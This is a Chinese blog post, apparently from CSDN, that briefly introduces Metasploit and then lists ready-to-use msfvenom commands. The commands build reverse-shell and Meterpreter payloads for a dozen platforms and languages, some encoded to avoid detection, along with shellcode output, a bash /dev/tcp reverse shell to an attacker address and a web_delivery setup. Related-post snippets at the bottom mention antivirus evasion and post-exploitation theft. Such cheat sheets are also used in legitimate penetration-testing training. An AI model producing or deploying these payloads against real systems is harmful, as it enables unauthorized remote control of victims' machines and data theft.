使用MSF生成各种Payload

原创 已于 2023-11-18 20:14:19 修改 · 6k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #Metasploit #ShellCode #Payload

于 2019-03-20 12:07:00 首次发布
Metasploit是广泛使用的开源渗透测试工具,有模块化框架、多种渗透测试工具等特点。支持用Ruby脚本定制扩展,有可视化界面和活跃社区。还能生成多种系统和语言的可执行文件及ShellCode,用于评估系统、网络和应用程序安全性。

Metasploit是一款广泛使用的开源渗透测试工具,旨在帮助安全专业人员评估系统、网络和应用程序的安全性。它提供了一个强大的框架和一系列工具,广泛用于渗透测试和漏洞利用,评估计算机系统、应用程序和网络的安全性。

Metasploit的主要特点:

  1. 模块化框架: Metasploit采用模块化的设计,允许用户轻松扩展其功能。模块可以是渗透测试的不同阶段,如信息收集、漏洞利用、后期渗透等。

  2. 多种渗透测试工具: Metasploit包含了多个渗透测试工具,用于执行各种攻击。其中一些工具是自动化的,而其他工具则提供了更大的灵活性,允许用户手动执行攻击。

  3. Payloads和Exploits: Metasploit提供了各种Payloads(攻击载荷)和Exploits(漏洞利用模块),用于在目标系统上执行特定的攻击。Payloads负责传递恶意代码,而Exploits则用于利用已知漏洞。

  4. 脚本语言支持: Metasploit支持使用Ruby脚本编写自定义模块和扩展功能。这使得用户能够定制和自动化渗透测试任务。

  5. 渗透测试框架: Metasploit是一个完整的渗透测试框架,支持各种渗透测试活动,包括信息收集、漏洞分析、攻击模拟和报告生成。

  6. 资源库: Metasploit包含一个广泛的漏洞和Exploit的数据库,这些信息可以用于渗透测试活动。用户可以查找和使用已知漏洞的Exploits,以测试目标系统的安全性。

  7. 可视化界面: Metasploit提供了一个Web界面(Metasploit Framework Web UI)和命令行界面,使用户能够以图形化或命令行的方式使用工具。

  8. 社区支持: Metasploit是一个开源项目,拥有活跃的社区。社区成员可以共享模块、Exploits和经验,有助于不断改进和更新工具。

生成各种可执行文件

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o
payload.exe

Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf

MAC OS

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho

Android

msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk

PowerShell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=
<Your Port to Connect On> -f raw > shell.php
	
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >>
shell.php

ASP.net

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp

War

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -
o payload.war

Node.js

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.js

Python

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -
f raw -o payload.py

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.pl

Ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.rb

Lua

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.lua


生成 ShellCode

Windows ShellCode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f c

linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f c

mac shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f c

Bash shellcode

[root@localhost ~]# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.30 LPORT=8888 > -f raw > payload.sh
[root@localhost ~]# exec 5<>/dev/tcp/xx.xx.xx.xx/xx
[root@localhost ~]# cat <&5 | while read line; do $line 2>&5 >&5; done

Python shellcode

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set srvhost 192.168.1.30
srvhost => 192.168.1.30
msf5 exploit(multi/script/web_delivery) > set lhost 192.168.1.30
lhost => 192.168.1.30
msf5 exploit(multi/script/web_delivery) > set uripath lyshark
uripath => lyshark
msf5 exploit(multi/script/web_delivery) > exploit -j -z
msfvenom生成payload参数讲解
afei001
03-21 1018
metasploit更新后去除了msfencode和msfpayload,并推出了全新的生成器:msfvenom msfvenom参数讲解 root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload...
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 6156
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
网络攻防作业——Msfvenom使用
yyy7654321的博客
06-28 4457
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
msfvenom制作payload
anan2175的博客
05-24 319
windows msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac msfvenom -a x86 --plat...
msfvenom常用脚本生成
03-19 432
1、 Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe 2、Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> ...
【渗透测试笔记】之【MSF 生成payload】_msf payload 生成c++
2401_84968665的博客
05-13 444
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 5943
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
msf生成payload大全
墨鱼菜鸡
09-10 407
目录 资源 一、payload 1.windwos 2.liunx 3.mac 4.android 5.Powershell 6.shellcode(windwos) 7.shellcode(liunx) 8.shellcode(mac) 二、反弹shell 1.python 2.bash 3.Perl 4.Lua 5.R...
msf生成payload
最新发布
03-21
</think>### 如何使用Metasploit生成PayloadMetasploit框架通过`msfvenom`工具生成自定义Payload,以下是详细步骤: --- #### **1. 基本语法** `msfvenom`的命令格式为: ```bash msfvenom -p <Payload类型> ...
使用shellcode打造MSF免杀payload
Coisini的博客
06-21 2028
0x00 前言 经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。 0x01 从哪里开始 shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它...
msf payload
weixin_34088838的博客
03-11 169
#clientmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b '\x00' -x /root/demo/calc.exe -f exe &gt; demo.exe #server:msfconsolemsf&gt; use exploit/m...
Msfpayload
天元喜羊羊的博客
07-09 2254
http://www.offensive-security.com/metasploit-unleashed/Msfpayload msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellco
【渗透测试笔记】之【MSF 生成payload
AA8j的博客
11-07 916
生成payload # 查看所有payloads show payloads # 查看windows可用(输完按两下回车) use payload/windows/ # 使用绑定端口payload msf5 > use payload/windows/shell_bind_tcp # 查看payload编码,里面可能含有“坏字符” msf5 payload(windows/shell_bind_tcp) > generate # 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指
Metasploit (MSF) 使用:包含基本使用payload生成、后渗透模块使用
Alone hackers的博客
03-06 6438
Metasploit (MSF) 使用:包含基本使用payload生成,后渗透模块使用
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
热门推荐
05-24 1万+
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
payload模块怎Linux,kali linux之Msf-exploit模块,生成payload
weixin_29582919的博客
05-13 605
Exploit模块Active exploit(主动地向目标机器发送payload并执行,使目标交出shell(反连等))msf5 > use exploit/windows/smb/psexecmsf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13msf5 exploit(windows/smb/psexec) > s...
msf-Windows payload
zzzzzyx_的博客
05-23 405
msfconsole 启动metasploit 然后 windows系统 msfvenom -p windows/meterpreter/reverse_tcp LHOST= _你的IP地址_ LPORT= _你的木马的IP地址_ -f exe > muma.exe 就这么一个不算文章的烂文章 您们也就不要赏钱了 下面????????的是坑钱的 其实我是一个 12 岁的 球娃 ...
生成常用的msf
weixin_34268310的博客
01-08 293
生成msf常用payload msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成payload列表: msfvenom -l 生成二进...
msf payload php,Metasploit(四)--Msfpayload命令
weixin_32304785的博客
03-11 608
msfpayload即将在2015年6月18日弃用,用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindowsmsfpayload-l|greplinuxmsfpayload-l|grepandriod列出某个平台的pyloadsmsfpayloadwindows/meterpreter/bind_t...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

微软技术分享

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值